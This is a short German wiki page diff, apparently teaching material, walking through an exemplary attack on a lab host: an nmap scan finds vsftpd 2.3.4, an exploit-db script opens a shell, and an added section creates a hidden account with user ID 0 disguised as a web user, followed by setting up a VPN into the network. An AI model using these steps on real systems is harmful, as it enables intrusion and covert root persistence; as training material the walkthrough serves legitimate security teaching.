Exemplarischer Angriff: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 19: | Zeile 19: | ||
*netstat -lntp | grep 22 | *netstat -lntp | grep 22 | ||
tcp6 0 0 :::22 :::* LISTEN 4360/sshd | tcp6 0 0 :::22 :::* LISTEN 4360/sshd | ||
| + | =User anlegen= | ||
| + | *useradd -m -o -u 0 -s /bin/bash -d /var/www www | ||
=VPN einrichten um Zugriff zum Netz zu erlangen= | =VPN einrichten um Zugriff zum Netz zu erlangen= | ||
*apt-get install ppp | *apt-get install ppp | ||
Version vom 7. Oktober 2021, 15:07 Uhr
Beispiel
- nmap -sV 10.80.100.105 -p 21
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST Nmap scan report for 10.80.100.105 Host is up (0.00056s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 Service Info: OS: Unix
Nach Exploit googlen
- vsftpd 2.3 4 exploit-db
Exploit finden
Exploit ausführen
- python vsftp.py 10.80.100.105
Success, shell opened Send `exit` to quit shell
Läuft ssh?
- netstat -lntp | grep 22
tcp6 0 0 :::22 :::* LISTEN 4360/sshd
User anlegen
- useradd -m -o -u 0 -s /bin/bash -d /var/www www
VPN einrichten um Zugriff zum Netz zu erlangen
- apt-get install ppp